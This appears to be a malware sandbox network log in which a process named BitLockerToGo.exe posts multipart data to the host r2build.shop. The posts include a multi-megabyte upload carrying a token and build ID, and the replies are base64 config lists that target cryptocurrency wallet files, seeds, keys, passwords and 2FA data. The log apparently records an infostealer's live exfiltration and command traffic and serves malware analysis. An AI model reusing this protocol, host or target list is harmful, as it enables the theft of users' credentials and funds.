                                                                                                                                                                                                                                    2025-01-09 13:01:58 UTC717OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                    2025-01-09 13:02:00 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                    Date: Thu, 09 Jan 2025 13:01:59 GMT
                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    2025-01-09 13:02:00 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    23192.168.2.44979794.130.191.1824433428C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    2025-01-09 13:01:59 UTC281OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----gdbi5pppzmgln7yua168
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                    Host: r2build.shop
                                                                                                                                                                                                                                    Content-Length: 6990993
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    2025-01-09 13:01:59 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 67 64 62 69 35 70 70 70 7a 6d 67 6c 6e 37 79 75 61 31 36 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 66 32 39 34 61 37 64 62 30 31 30 31 64 30 65 31 63 65 32 31 61 37 35 61 33 64 37 35 63 61 34 0d 0a 2d 2d 2d 2d 2d 2d 67 64 62 69 35 70 70 70 7a 6d 67 6c 6e 37 79 75 61 31 36 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 33 30 66 30 38 35 31 62 31 66 38 31 35 37 38 38 61 34 66 34 31 37 65 34 36 36 64 39 62 37 30 30 0d 0a 2d 2d 2d 2d 2d 2d 67 64 62 69 35 70 70 70 7a 6d 67 6c 6e 37 79 75 61 31 36 38 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                    Data Ascii: ------gdbi5pppzmgln7yua168Content-Disposition: form-data; name="token"cf294a7db0101d0e1ce21a75a3d75ca4------gdbi5pppzmgln7yua168Content-Disposition: form-data; name="build_id"30f0851b1f815788a4f417e466d9b700------gdbi5pppzmgln7yua168Cont
                                                                                                                                                                                                                                    2025-01-09 13:01:59 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                    2025-01-09 13:01:59 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                    2025-01-09 13:01:59 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                    2025-01-09 13:01:59 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                    2025-01-09 13:01:59 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                    2025-01-09 13:01:59 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                    2025-01-09 13:01:59 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                    2025-01-09 13:01:59 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                    2025-01-09 13:01:59 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                    2025-01-09 13:02:06 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                    Date: Thu, 09 Jan 2025 13:02:06 GMT
                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    Connection: close


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    24192.168.2.44980494.130.191.1824433428C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    2025-01-09 13:02:00 UTC277OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----p8glx4ozu37yu3wl6p8q
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                    Host: r2build.shop
                                                                                                                                                                                                                                    Content-Length: 331
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    2025-01-09 13:02:00 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 70 38 67 6c 78 34 6f 7a 75 33 37 79 75 33 77 6c 36 70 38 71 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 66 32 39 34 61 37 64 62 30 31 30 31 64 30 65 31 63 65 32 31 61 37 35 61 33 64 37 35 63 61 34 0d 0a 2d 2d 2d 2d 2d 2d 70 38 67 6c 78 34 6f 7a 75 33 37 79 75 33 77 6c 36 70 38 71 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 33 30 66 30 38 35 31 62 31 66 38 31 35 37 38 38 61 34 66 34 31 37 65 34 36 36 64 39 62 37 30 30 0d 0a 2d 2d 2d 2d 2d 2d 70 38 67 6c 78 34 6f 7a 75 33 37 79 75 33 77 6c 36 70 38 71 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                    Data Ascii: ------p8glx4ozu37yu3wl6p8qContent-Disposition: form-data; name="token"cf294a7db0101d0e1ce21a75a3d75ca4------p8glx4ozu37yu3wl6p8qContent-Disposition: form-data; name="build_id"30f0851b1f815788a4f417e466d9b700------p8glx4ozu37yu3wl6p8qCont
                                                                                                                                                                                                                                    2025-01-09 13:02:01 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                    Date: Thu, 09 Jan 2025 13:02:01 GMT
                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    2025-01-09 13:02:01 UTC2228INData Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47
                                                                                                                                                                                                                                    Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    25192.168.2.44981594.130.191.1824433428C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    2025-01-09 13:02:02 UTC277OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----aieusr9zmglfuas2n7gd
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                    Host: r2build.shop
                                                                                                                                                                                                                                    Content-Length: 331
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    2025-01-09 13:02:02 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 61 69 65 75 73 72 39 7a 6d 67 6c 66 75 61 73 32 6e 37 67 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 66 32 39 34 61 37 64 62 30 31 30 31 64 30 65 31 63 65 32 31 61 37 35 61 33 64 37 35 63 61 34 0d 0a 2d 2d 2d 2d 2d 2d 61 69 65 75 73 72 39 7a 6d 67 6c 66 75 61 73 32 6e 37 67 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 33 30 66 30 38 35 31 62 31 66 38 31 35 37 38 38 61 34 66 34 31 37 65 34 36 36 64 39 62 37 30 30 0d 0a 2d 2d 2d 2d 2d 2d 61 69 65 75 73 72 39 7a 6d 67 6c 66 75 61 73 32 6e 37 67 64 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                    Data Ascii: ------aieusr9zmglfuas2n7gdContent-Disposition: form-data; name="token"cf294a7db0101d0e1ce21a75a3d75ca4------aieusr9zmglfuas2n7gdContent-Disposition: form-data; name="build_id"30f0851b1f815788a4f417e466d9b700------aieusr9zmglfuas2n7gdCont
                                                                                                                                                                                                                                    2025-01-09 13:02:03 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                    Date: Thu, 09 Jan 2025 13:02:02 GMT
                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    2025-01-09 13:02:03 UTC1524INData Raw: 35 65 38 0d 0a 52 45 56 54 53 31 52 50 55 48 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 69 6f 73 4b 6e 4e 6c 5a 57 51 71 4c 69 6f 73 4b 6d 4a 30 59 79 6f 75 4b 69 77 71 61 32 56 35 4b 69 34 71 4c 43 6f 79 5a 6d 45 71 4c 69 6f 73 4b 6d 4e 79 65 58 42 30 62 79 6f 75 4b 69 77 71 59 32 39 70 62 69 6f 75 4b 69 77 71 63 48 4a 70 64 6d 46 30 5a 53 6f 75 4b 69 77 71 4d 6d 5a 68 4b 69 34 71 4c 43 70 68 64 58 52 6f 4b 69 34 71 4c 43 70 73 5a 57 52 6e 5a 58 49 71 4c 69 6f 73 4b 6e 52 79 5a 58 70 76 63 69 6f 75 4b 69 77 71 63 47 46 7a 63 79 6f 75 4b 69 77 71 64 32 46 73 4b 69 34 71 4c 43 70 31 63 47 4a 70 64 43 6f 75 4b 69 77 71 59 6d 4e 6c 65 43 6f 75 4b 69 77 71 59 6d 6c 30 61 47 6c 74 59 69 6f 75 4b 69 77 71 61 47 6c 30 59 6e
                                                                                                                                                                                                                                    Data Ascii: 5e8REVTS1RPUHwlREVTS1RPUCVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKiwqaGl0Yn


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    26192.168.2.44982594.130.191.1824433428C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    2025-01-09 13:02:03 UTC277OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----glf379z5pzctjek68gv3
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                    Host: r2build.shop
                                                                                                                                                                                                                                    Content-Length: 453
                                                                                                                                                                                                                                    Connection: Keep-Alive
